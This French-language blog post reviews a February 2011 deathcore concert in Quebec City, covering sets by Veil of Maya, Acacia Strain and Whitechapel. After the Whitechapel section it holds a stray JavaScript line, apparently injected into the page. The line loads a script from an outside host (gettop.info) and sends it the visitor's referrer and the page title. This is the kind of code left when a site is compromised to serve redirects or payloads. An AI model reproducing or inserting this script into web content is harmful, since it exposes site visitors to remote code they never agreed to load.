Whitechapel : À l’impérial de Québec pour


Facebooktwitterredditpinterestlinkedinmail

Concert du 21 février 2011

Impérial de Québec ce soir !!

Bands:

1. I Declare War

2. Veil of Maya

3. Acacia Strain

4. Whitechapel

5. Chelsea Grin

Un bon show de métal encore ce soir à l’Impérial de Québec, une salle qui est à notre avis bien situé pour ce genre de show mais aussi juste de la bonne taille pour avoir un son intense et avoir une excellente vue des bands. Ce soir, les fans en ont eu pour leur argent avec un « line-up constitué » uniquement de groupe « Deathcore ». La salle n’était malheureusement pas comble mais les groupes se sont occupés de nous faire oublier ça rapidement.

Veil of maya:

Groupe qui n’en est pas à sont premier show d’ouverture à Québec. Les gars de Chicago ont une sonorité qui leur est propre. Ils ont des mélodies qui se rapprochent du « Technical Death Metal » tout en ayant un genre de « sampling live » qui est créé par le guitariste lors de la présentation d’un morceau. Bon vocal et bonnes percussions. Le son était très bien défini et la présence sur scène était bien. un groupe à surveiller, mais qui n’est pas 100% Deathcore si vous êtes un puriste.

Acacia Strain:

Une révélation à notre avis. Très pesant, vocal « grunt » bien gras mais le chanteur utilise surtout un « scream » aiguë classique au genre. Ils ont invités très rapidement le parterre à plonger de la scène. Invitation répété à maintes reprises à peu près de cette manière: « We want you to stage dive now! Use every ninja moves you know! » Comique par moment, mais aucun blessé n’a été signalé! Le son était nettement supérieur à Veil of Maya, et visuellement plus intéressant à regarder. En résumé: « break down beat »! Classique. Et ils viennent de Springfield, Masachusetts. Mais ils ne sont pas jaunes…

Whitechapel:

Le « set » de White Chapel n’a pas été allongé malgré le fait qu’un groupe n’ait pu être présent. Malgré cela, la brutalité de leur musique et l’intensité du chanteur nous font oublier cela rapidement. Ils ont un style, le maîtrise et on aime ça. On reconnait facilement les morceaux choisi par le groupe, ce qui n’est pas toujours évident dans ce style musical. Eux aussi ont invité la foule régulièrement à participer et cela a créé le plus beau « mush pit » que j’ai vu jusqu’à maintenant.

On voit rarement un groupe constitué de 6 musiciens dans ce genre, mais on se rend compte que grâce à ce nombre, la texture sonore est beaucoup plus dense, voir pesante. Le groupe est en tournée pour présenter leur troisième album. Ils ont un style qui leur est propre et nous dirions mature dans le genre. La dernière pièce du spectacle, « This is Exile » est la pièce éponyme du deuxième album.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Michel Louvain : En entrevue
Next Neïman : En entrevue

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *